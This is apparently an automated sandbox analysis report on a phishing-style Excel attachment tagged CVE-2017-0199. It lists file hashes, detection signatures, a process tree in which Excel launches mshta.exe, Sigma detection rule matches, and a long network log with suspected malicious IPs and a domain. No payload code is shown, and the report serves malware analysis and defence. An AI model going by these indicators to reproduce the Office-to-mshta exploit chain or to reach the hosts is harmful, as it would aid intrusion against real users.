Joe Sandbox Cloud Basic Analysis Report
Edit tour

Windows Analysis Report
ENQUIRY - RFQ 674441-76450.xla.xlsx

Overview

General Information

Sample name:ENQUIRY - RFQ 674441-76450.xla.xlsx
Analysis ID:1646794
MD5:728def92ce2cf1e59208b5747c4f29e8
SHA1:b4a65a2275e8b1dbb37bb1ad7949f6f456da1773
SHA256:e822eabb8cd2fdd493bda865b2deebc1d4e272da9f1b17b8729de2289a31da3e
Tags:CVE-2017-0199xlaxlsxuser-abuse_ch
Infos:

Detection

Score:60
Range:0 - 100
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Sigma detected: Suspicious Microsoft Office Child Process
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Suricata IDS alerts with low severity for network traffic
Unable to load, office file is protected or invalid
Uses a known web browser user agent for HTTP communication

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 1896 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • mshta.exe (PID: 7844 cmdline: C:\Windows\SysWOW64\mshta.exe -Embedding MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • splwow64.exe (PID: 7952 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • EXCEL.EXE (PID: 4572 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\ENQUIRY - RFQ 674441-76450.xla.xlsx" MD5: 4A871771235598812032C822E6F68F19)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\SysWOW64\mshta.exe -Embedding, CommandLine: C:\Windows\SysWOW64\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 1896, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\SysWOW64\mshta.exe -Embedding, ProcessId: 7844, ProcessName: mshta.exe
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DesusertionIp: 43.152.182.96, DesusertionIsIpv6: false, DesusertionPort: 80, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 1896, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49687
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DesusertionIp: 192.168.2.9, DesusertionIsIpv6: false, DesusertionPort: 49687, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 1896, Protocol: tcp, SourceIp: 43.152.182.96, SourceIsIpv6: false, SourcePort: 80

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-03-24T09:33:31.711934+010020283713Unknown Traffic192.168.2.94970113.107.246.40443TCP
2025-03-24T09:33:37.900489+010020283713Unknown Traffic192.168.2.94970313.107.246.40443TCP
2025-03-24T09:33:37.900636+010020283713Unknown Traffic192.168.2.94970213.107.246.40443TCP

Joe Sandbox Signatures

  • AV Detection
  • Compliance
  • Software Vulnerabilities
  • Networking
  • System Summary
  • Hooking and other Techniques for Hiding and Protection
  • Malware Analysis System Evasion

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: ENQUIRY - RFQ 674441-76450.xla.xlsxVirustotal: Detection: 27%Perma Link
Source: ENQUIRY - RFQ 674441-76450.xla.xlsxReversingLabs: Detection: 27%
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 162.19.137.157:443 -> 192.168.2.9:49699 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.40:443 -> 192.168.2.9:49701 version: TLS 1.2

Software Vulnerabilities

barindex
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe
Source: global trafficDNS query: name: t.emobility.energy
Source: global trafficDNS query: name: otelrules.svc.static.microsoft
Source: global trafficTCP traffic: 192.168.2.9:49699 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49702 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49703 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49687 -> 43.152.182.96:80
Source: global trafficTCP traffic: 192.168.2.9:49689 -> 43.152.182.96:80
Source: global trafficTCP traffic: 192.168.2.9:49700 -> 217.154.55.185:80
Source: global trafficTCP traffic: 192.168.2.9:49699 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.9:49699 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.9:49699 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.9:49699 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.9:49699 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.9:49699 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.9:49699 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.9:49699 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.9:49699 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.9:49699 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49702 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49702 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49702 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49703 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49703 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49703 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49703 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49702 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49702 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49703 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49703 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49703 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49703 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49703 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49702 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49702 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49702 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49687 -> 43.152.182.96:80
Source: global trafficTCP traffic: 43.152.182.96:80 -> 192.168.2.9:49687
Source: global trafficTCP traffic: 192.168.2.9:49687 -> 43.152.182.96:80
Source: global trafficTCP traffic: 192.168.2.9:49687 -> 43.152.182.96:80
Source: global trafficTCP traffic: 43.152.182.96:80 -> 192.168.2.9:49687
Source: global trafficTCP traffic: 43.152.182.96:80 -> 192.168.2.9:49687
Source: global trafficTCP traffic: 43.152.182.96:80 -> 192.168.2.9:49687
Source: global trafficTCP traffic: 192.168.2.9:49687 -> 43.152.182.96:80
Source: global trafficTCP traffic: 43.152.182.96:80 -> 192.168.2.9:49687
Source: global trafficTCP traffic: 192.168.2.9:49687 -> 43.152.182.96:80
Source: global trafficTCP traffic: 192.168.2.9:49687 -> 43.152.182.96:80
Source: global trafficTCP traffic: 43.152.182.96:80 -> 192.168.2.9:49687
Source: global trafficTCP traffic: 192.168.2.9:49689 -> 43.152.182.96:80
Source: global trafficTCP traffic: 43.152.182.96:80 -> 192.168.2.9:49689
Source: global trafficTCP traffic: 192.168.2.9:49689 -> 43.152.182.96:80
Source: global trafficTCP traffic: 192.168.2.9:49689 -> 43.152.182.96:80
Source: global trafficTCP traffic: 43.152.182.96:80 -> 192.168.2.9:49689
Source: global trafficTCP traffic: 43.152.182.96:80 -> 192.168.2.9:49689
Source: global trafficTCP traffic: 43.152.182.96:80 -> 192.168.2.9:49689
Source: global trafficTCP traffic: 192.168.2.9:49689 -> 43.152.182.96:80
Source: global trafficTCP traffic: 43.152.182.96:80 -> 192.168.2.9:49689
Source: global trafficTCP traffic: 43.152.182.96:80 -> 192.168.2.9:49689
Source: global trafficTCP traffic: 43.152.182.96:80 -> 192.168.2.9:49689
Source: global trafficTCP traffic: 192.168.2.9:49689 -> 43.152.182.96:80
Source: global trafficTCP traffic: 43.152.182.96:80 -> 192.168.2.9:49689
Source: global trafficTCP traffic: 43.152.182.96:80 -> 192.168.2.9:49689
Source: global trafficTCP traffic: 43.152.182.96:80 -> 192.168.2.9:49689
Source: global trafficTCP traffic: 192.168.2.9:49689 -> 43.152.182.96:80
Source: global trafficTCP traffic: 192.168.2.9:49689 -> 43.152.182.96:80
Source: global trafficTCP traffic: 43.152.182.96:80 -> 192.168.2.9:49689
Source: global trafficTCP traffic: 192.168.2.9:49689 -> 43.152.182.96:80
Source: global trafficTCP traffic: 43.152.182.96:80 -> 192.168.2.9:49689
Source: global trafficTCP traffic: 192.168.2.9:49689 -> 43.152.182.96:80
Source: global trafficTCP traffic: 192.168.2.9:49699 -> 162.19.137.157:443
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.9:49699
Source: global trafficTCP traffic: 192.168.2.9:49699 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.9:49699 -> 162.19.137.157:443
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.9:49699
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.9:49699
Source: global trafficTCP traffic: 192.168.2.9:49699 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.9:49699 -> 162.19.137.157:443
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.9:49699
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.9:49699
Source: global trafficTCP traffic: 192.168.2.9:49699 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.9:49699 -> 162.19.137.157:443
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.9:49699
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.9:49699
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.9:49699
Source: global trafficTCP traffic: 192.168.2.9:49699 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.9:49699 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.9:49699 -> 162.19.137.157:443
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.9:49699
Source: global trafficTCP traffic: 192.168.2.9:49700 -> 217.154.55.185:80
Source: global trafficTCP traffic: 217.154.55.185:80 -> 192.168.2.9:49700
Source: global trafficTCP traffic: 192.168.2.9:49700 -> 217.154.55.185:80
Source: global trafficTCP traffic: 192.168.2.9:49700 -> 217.154.55.185:80
Source: global trafficTCP traffic: 217.154.55.185:80 -> 192.168.2.9:49700
Source: global trafficTCP traffic: 217.154.55.185:80 -> 192.168.2.9:49700
Source: global trafficTCP traffic: 217.154.55.185:80 -> 192.168.2.9:49700
Source: global trafficTCP traffic: 217.154.55.185:80 -> 192.168.2.9:49700
Source: global trafficTCP traffic: 192.168.2.9:49700 -> 217.154.55.185:80
Source: global trafficTCP traffic: 217.154.55.185:80 -> 192.168.2.9:49700
Source: global trafficTCP traffic: 192.168.2.9:49700 -> 217.154.55.185:80
Source: global trafficTCP traffic: 192.168.2.9:49700 -> 217.154.55.185:80
Source: global trafficTCP traffic: 217.154.55.185:80 -> 192.168.2.9:49700
Source: global trafficTCP traffic: 192.168.2.9:49700 -> 217.154.55.185:80
Source: global trafficTCP traffic: 43.152.182.96:80 -> 192.168.2.9:49689
Source: global trafficTCP traffic: 192.168.2.9:49689 -> 43.152.182.96:80
Source: global trafficTCP traffic: 192.168.2.9:49689 -> 43.152.182.96:80
Source: global trafficTCP traffic: 43.152.182.96:80 -> 192.168.2.9:49689
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.9:49701
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.9:49701
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.9:49701
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.9:49701
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.9:49701
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.9:49701
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.9:49701
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.9:49701
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.9:49701
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.9:49701
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.9:49701
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.9:49701
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
